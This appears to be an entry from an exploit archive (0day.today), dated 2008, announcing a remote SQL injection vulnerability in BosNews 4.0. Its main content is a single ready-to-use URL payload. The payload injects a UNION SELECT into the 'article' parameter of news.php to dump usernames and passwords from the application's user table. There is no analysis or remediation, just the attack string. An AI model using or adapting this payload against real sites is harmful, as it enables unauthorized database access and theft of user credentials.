id: 2880
date: 04/13/2008
title: BosNews 4.0 (article) Remote SQL Injection Vulnerability
author: Crackers_Child
cves: 

========================================================
BosNews 4.0 (article) Remote SQL Injection Vulnerability
========================================================



##############################################################################
##                                  By Crackers_Child
##
##  BosNews v4.0 Remote Sql injection Exploit
##
##  Script website:http://www.bosdev.com
##
##  Exploit : " site.com/path/news.php?news=more&article=248+union%20select%200,1,username,password,4%20from%20bosdevUUS/*
##############################################################################



#  0day.today [2023-03-24]  #